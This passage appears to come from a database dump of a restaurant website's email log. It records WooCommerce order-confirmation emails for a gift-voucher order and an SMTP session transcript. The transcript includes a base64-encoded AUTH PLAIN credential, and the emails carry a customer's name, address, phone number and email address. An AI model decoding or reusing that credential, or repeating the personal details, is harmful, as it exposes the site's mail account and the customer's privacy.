style=3D\'color: #557da1; display: block; font-family: \"Helvetica Neue=\r\n\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: b=\r\nold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>=0A=09<a cl=\r\nass=3D\"link\" href=3D\"https://www.ristorantesolymar.it/wp-admin/post.php?=\r\npost=3D1257&amp;action=3Dedit\" style=3D\"font-weight: normal; text-decora=\r\ntion: underline; color: #557da1;\">[Order #1257]</a> (28 November 2020)</=\r\nh2>=0A=0A<div style=3D\"margin-bottom: 40px;\">=0A=09<table class=3D\"td\" c=\r\nellspacing=3D\"0\" cellpadding=3D\"6\" border=3D\"1\" style=3D\"color: #737373;=\r\n border: 1px solid #e4e4e4; vertical-align: middle; width: 100%; font-fa=\r\nmily: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">=0A=09=09=\r\n<thead>=0A=09=09=09<tr>=0A=09=09=09=09<th class=3D\"td\" scope=3D\"col\" sty=\r\nle=3D\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle;=\r\n padding: 12px; text-align: left;\">Product</th>=0A=09=09=09=09<th class=\r\n=3D\"td\" scope=3D\"col\" style=3D\"color: #737373; border: 1px solid #e4e4e4=\r\n; vertical-align: middle; padding: 12px; text-align: left;\">Quantity</th=\r\n>=0A=09=09=09=09<th class=3D\"td\" scope=3D\"col\" style=3D\"color: #737373;=\r\n border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-=\r\nalign: left;\">Price</th>=0A=09=09=09</tr>=0A=09=09</thead>=0A=09=09<tbod=\r\ny>=0A=09=09=09=09<tr class=3D\"order_item\">=0A=09=09<td class=3D\"td\" styl=\r\ne=3D\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-alig=\r\nn: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetic=\r\na, Roboto, Arial, sans-serif; word-wrap: break-word;\">=0A=09=09Buono Reg=\r\nalo (valore a scelta) (#coupon)<ul class=3D\"wc-item-meta\" style=3D\"font-=\r\nsize: small; margin: 1em 0 0; padding: 0; list-style: none;\">=0A<li styl=\r\ne=3D\"margin: 0.5em 0 0; padding: 0;\">=0A<strong class=3D\"wc-item-meta-la=\r\nbel\" style=3D\"float: left; margin-right: .25em; clear: both;\">To:</stron=\r\ng> <p style=3D\"margin: 0;\">Matteo Arlotti</p>=0A</li>=0A<li style=3D\"mar=\r\ngin: 0.5em 0 0; padding: 0;\">=0A<strong class=3D\"wc-item-meta-label\" sty=\r\nle=3D\"float: left; margin-right: .25em; clear: both;\">From:</strong> <p=\r\n style=3D\"margin: 0;\">Matteo Arlotti</p>=0A</li>=0A<li style=3D\"margin:=\r\n 0.5em 0 0; padding: 0;\">=0A<strong class=3D\"wc-item-meta-label\" style=\r\n=3D\"float: left; margin-right: .25em; clear: both;\">Message:</strong> <p=\r\n style=3D\"margin: 0;\">Cena delivery 28-11<br>=0AViale Ugo Foscolo 27 - R=\r\nimini  47921<br>=0A371 3930671</p>=0A</li>=0A</ul>=09=09</td>=0A=09=09<t=\r\nd class=3D\"td\" style=3D\"color: #737373; border: 1px solid #e4e4e4; paddi=\r\nng: 12px; text-align: left; vertical-align: middle; font-family: \'Helvet=\r\nica Neue\', Helvetica, Roboto, Arial, sans-serif;\">=0A=09=09=091=09=09</t=\r\nd>=0A=09=09<td class=3D\"td\" style=3D\"color: #737373; border: 1px solid #=\r\ne4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-fa=\r\nmily: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">=0A=09=09=\r\n=09<span class=3D\"woocommerce-Price-amount amount\">58,00<span class=3D\"w=\r\noocommerce-Price-currencySymbol\">=E2=82=AC</span></span>=09=09</td>=0A=\r\n=09</tr>=0A=09=0A=09=09</tbody>=0A=09=09<tfoot>=0A=09=09=09=09=09=09=09=\r\n=09<tr>=0A=09=09=09=09=09=09<th class=3D\"td\" scope=3D\"row\" colspan=3D\"2\"=\r\n style=3D\"color: #737373; border: 1px solid #e4e4e4; vertical-align: mid=\r\ndle; padding: 12px; text-align: left; border-top-width: 4px;\">Subtotal:<=\r\n/th>=0A=09=09=09=09=09=09<td class=3D\"td\" style=3D\"color: #737373; borde=\r\nr: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align:=\r\n left; border-top-width: 4px;\"><span class=3D\"woocommerce-Price-amount a=\r\nmount\">58,00<span class=3D\"woocommerce-Price-currencySymbol\">=E2=82=AC</=\r\nspan></span></td>=0A=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=09=\r\n=09<tr>=0A=09=09=09=09=09=09<th class=3D\"td\" scope=3D\"row\" colspan=3D\"2\"=\r\n style=3D\"color: #737373; border: 1px solid #e4e4e4; vertical-align: mid=\r\ndle; padding: 12px; text-align: left;\">Payment method:</th>=0A=09=09=09=\r\n=09=09=09<td class=3D\"td\" style=3D\"color: #737373; border: 1px solid #e4=\r\ne4e4; vertical-align: middle; padding: 12px; text-align: left;\">PayPal</=\r\ntd>=0A=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=\r\n=09=09=09=09<th class=3D\"td\" scope=3D\"row\" colspan=3D\"2\" style=3D\"color:=\r\n #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12=\r\npx; text-align: left;\">Total:</th>=0A=09=09=09=09=09=09<td class=3D\"td\"=\r\n style=3D\"color: #737373; border: 1px solid #e4e4e4; vertical-align: mid=\r\ndle; padding: 12px; text-align: left;\"><span class=3D\"woocommerce-Price-=\r\namount amount\">58,00<span class=3D\"woocommerce-Price-currencySymbol\">=E2=\r\n=82=AC</span></span></td>=0A=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=\r\n</tfoot>=0A=09</table>=0A</div>=0A=0A=0A<table id=3D\"addresses\" cellspac=\r\ning=3D\"0\" cellpadding=3D\"0\" border=3D\"0\" style=3D\"width: 100%; vertical-=\r\nalign: top; margin-bottom: 40px; padding: 0;\">=0A=09<tr>=0A=09=09<td val=\r\nign=3D\"top\" width=3D\"50%\" style=3D\"text-align: left; font-family: \'Helve=\r\ntica Neue\', Helvetica, Roboto, Arial, sans-serif; border: 0; padding: 0;=\r\n\">=0A=09=09=09<h2 style=3D\'color: #557da1; display: block; font-family:=\r\n \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px=\r\n; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: le=\r\nft;\'>Billing address</h2>=0A=0A=09=09=09<address class=3D\"address\" style=\r\n=3D\"padding: 12px; color: #737373; border: 1px solid #e4e4e4;\">=0A=09=09=\r\n=09=09inclubitalia<br>Matteo Arlotti<br>Viale Ugo Foscolo 27<br>47921<br=\r\n>Rimini<br>RIMINI=09=09=09=09=09=09=09=09=09<br><a href=3D\"tel:371393067=\r\n1\" style=3D\"color: #557da1; font-weight: normal; text-decoration: underl=\r\nine;\">371 3930671</a>=09=09=09=09=09=09=09=09=09=09=09=09=09<br>arlostaf=\r\nf@gmail.com=09=09=09=09=09=09=09</address>=0A=09=09</td>=0A=09=09=09</tr=\r\n>=0A</table>=0A<p style=3D\"margin: 0 0 16px;\">Congratulations on the sal=\r\ne.</p>=0A=09=09=09=09=09=09=09=09=09=09=09=09=09=09=09</div>=0A=09=09=09=\r\n=09=09=09=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09=09=09=09=\r\n=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=09=09=09=09</table>=0A=09=09=\r\n=09=09=09=09=09=09=09=09=09=09<!-- End Content -->=0A=09=09=09=09=09=09=\r\n=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=09=\r\n=09=09=09=09=09=09</table>=0A=09=09=09=09=09=09=09=09=09<!-- End Body --=\r\n>=0A=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09</tr>=0A=09=09=\r\n=09=09=09=09</table>=0A=09=09=09=09=09</td>=0A=09=09=09=09</tr>=0A=09=09=\r\n=09=09<tr>=0A=09=09=09=09=09<td align=3D\"center\" valign=3D\"top\">=0A=09=\r\n=09=09=09=09=09<!-- Footer -->=0A=09=09=09=09=09=09<table border=3D\"0\" c=\r\nellpadding=3D\"10\" cellspacing=3D\"0\" width=3D\"600\" id=3D\"template_footer\"=\r\n>=0A=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09<td valign=3D\"to=\r\np\" style=3D\"padding: 0; border-radius: 6px;\">=0A=09=09=09=09=09=09=09=09=\r\n=09<table border=3D\"0\" cellpadding=3D\"10\" cellspacing=3D\"0\" width=3D\"100=\r\n%\">=0A=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09=09=\r\n=09=09<td colspan=3D\"2\" valign=3D\"middle\" id=3D\"credit\" style=3D\'border-=\r\nradius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", H=\r\nelvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%;=\r\n text-align: center; padding: 24px 0;\'>=0A=09=09=09=09=09=09=09=09=09=09=\r\n=09=09<p style=3D\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p=\r\n>=0A=09=09=09=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09=09=09=\r\n=09</tr>=0A=09=09=09=09=09=09=09=09=09</table>=0A=09=09=09=09=09=09=09=\r\n=09</td>=0A=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09</table>=0A=09=\r\n=09=09=09=09=09<!-- End Footer -->=0A=09=09=09=09=09</td>=0A=09=09=09=09=\r\n</tr>=0A=09=09=09</table>=0A=09=09</div>=0A=09</body>=0A</html>=0A\r\n.\r\n250 OK id=1kj1Cv-0008ED-Kn\r\n'),(22838,1260,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(22839,1260,'success',''),(22840,1260,'from_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(22841,1260,'to_header','arlostaff@gmail.com'),(22842,1260,'reply_to_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(22843,1260,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(22844,1260,'original_to','arlostaff@gmail.com'),(22845,1260,'original_subject','Your Sol Y Mar, ristorante a Riccione order has been received!'),(22846,1260,'original_message','<!DOCTYPE html>\n<html lang=\"en-US\">\n	<head>\n		<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n		<title>Sol Y Mar, ristorante a Riccione</title>\n	</head>\n	<body leftmargin=\"0\" marginwidth=\"0\" topmargin=\"0\" marginheight=\"0\" offset=\"0\" style=\"padding: 0;\">\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-adjust: none;\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1); border-radius: 3px;\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1; color: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; vertical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radius: 3px 3px 0 0;\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px; display: block;\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color: inherit;\'>Thank you for your order</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd;\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px;\">\n															<div id=\"body_content_inner\" style=\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>\n\n<p style=\"margin: 0 0 16px;\">Hi Matteo,</p>\n<p style=\"margin: 0 0 16px;\">Just to let you know — we\'ve received your order #1257, and it is now being processed:</p>\n\n\n<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>\n	[Order #1257] (28 November 2020)</h2>\n\n<div style=\"margin-bottom: 40px;\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; width: 100%; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Product</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Quantity</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Price</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; word-wrap: break-word;\">\n		Buono Regalo (valore a scelta)<ul class=\"wc-item-meta\" style=\"font-size: small; margin: 1em 0 0; padding: 0; list-style: none;\">\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To:</strong> <p style=\"margin: 0;\">Matteo Arlotti</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">From:</strong> <p style=\"margin: 0;\">Matteo Arlotti</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">Message:</strong> <p style=\"margin: 0;\">Cena delivery 28-11<br>\nViale Ugo Foscolo 27 - Rimini  47921<br>\n371 3930671</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			<span class=\"woocommerce-Price-amount amount\">58,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n			<tr>\n			<td colspan=\"3\" style=\"padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n				<p style=\"margin: 0 0 16px;\">Validità 6 mesi dal momento dell\'acquisto</p>\n			</td>\n		</tr>\n		\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\">Subtotal:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\"><span class=\"woocommerce-Price-amount amount\">58,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Payment method:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Total:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\"><span class=\"woocommerce-Price-amount amount\">58,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n							</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%; vertical-align: top; margin-bottom: 40px; padding: 0;\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; border: 0; padding: 0;\">\n			<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>Billing address</h2>\n\n			<address class=\"address\" style=\"padding: 12px; color: #737373; border: 1px solid #e4e4e4;\">\n				inclubitalia<br>Matteo Arlotti<br>Viale Ugo Foscolo 27<br>47921<br>Rimini<br>RIMINI									<br><a href=\"tel:3713930671\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">371 3930671</a>													<br>arlostaff@gmail.com							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px;\">Thanks for using www.ristorantesolymar.it!</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0; border-radius: 6px;\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>\n												<p style=\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	</body>\n</html>\n'),(22847,1260,'original_headers','Content-Type: text/html\r\nReply-to: Sol Y Mar, ristorante a Riccione <notifiche@ristorantesolymar.it>\r\n'),(22848,1260,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Sat, 28 Nov 2020 09:28:13 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(22849,1261,'solution','Not found, check status column for more info.'),(22850,1261,'success','1'),(22851,1261,'from_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(22852,1261,'to_header','arlostaff@gmail.com'),(22853,1261,'reply_to_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(22854,1261,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(22855,1261,'original_to','arlostaff@gmail.com'),(22856,1261,'original_subject','Your Sol Y Mar, ristorante a Riccione order has been received!'),(22857,1261,'original_message','<!DOCTYPE html>\n<html lang=\"en-US\">\n	<head>\n		<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n		<title>Sol Y Mar, ristorante a Riccione</title>\n	</head>\n	<body leftmargin=\"0\" marginwidth=\"0\" topmargin=\"0\" marginheight=\"0\" offset=\"0\" style=\"padding: 0;\">\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-adjust: none;\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1); border-radius: 3px;\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1; color: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; vertical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radius: 3px 3px 0 0;\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px; display: block;\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color: inherit;\'>Thank you for your order</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd;\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px;\">\n															<div id=\"body_content_inner\" style=\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>\n\n<p style=\"margin: 0 0 16px;\">Hi Matteo,</p>\n<p style=\"margin: 0 0 16px;\">Just to let you know — we\'ve received your order #1257, and it is now being processed:</p>\n\n\n<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>\n	[Order #1257] (28 November 2020)</h2>\n\n<div style=\"margin-bottom: 40px;\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; width: 100%; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Product</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Quantity</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Price</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; word-wrap: break-word;\">\n		Buono Regalo (valore a scelta)<ul class=\"wc-item-meta\" style=\"font-size: small; margin: 1em 0 0; padding: 0; list-style: none;\">\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To:</strong> <p style=\"margin: 0;\">Matteo Arlotti</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">From:</strong> <p style=\"margin: 0;\">Matteo Arlotti</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">Message:</strong> <p style=\"margin: 0;\">Cena delivery 28-11<br>\nViale Ugo Foscolo 27 - Rimini  47921<br>\n371 3930671</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			<span class=\"woocommerce-Price-amount amount\">58,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n			<tr>\n			<td colspan=\"3\" style=\"padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n				<p style=\"margin: 0 0 16px;\">Validità 6 mesi dal momento dell\'acquisto</p>\n			</td>\n		</tr>\n		\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\">Subtotal:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\"><span class=\"woocommerce-Price-amount amount\">58,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Payment method:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Total:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\"><span class=\"woocommerce-Price-amount amount\">58,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n							</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%; vertical-align: top; margin-bottom: 40px; padding: 0;\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; border: 0; padding: 0;\">\n			<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>Billing address</h2>\n\n			<address class=\"address\" style=\"padding: 12px; color: #737373; border: 1px solid #e4e4e4;\">\n				inclubitalia<br>Matteo Arlotti<br>Viale Ugo Foscolo 27<br>47921<br>Rimini<br>RIMINI									<br><a href=\"tel:3713930671\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">371 3930671</a>													<br>arlostaff@gmail.com							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px;\">Thanks for using www.ristorantesolymar.it!</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0; border-radius: 6px;\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px; border: 0; color: 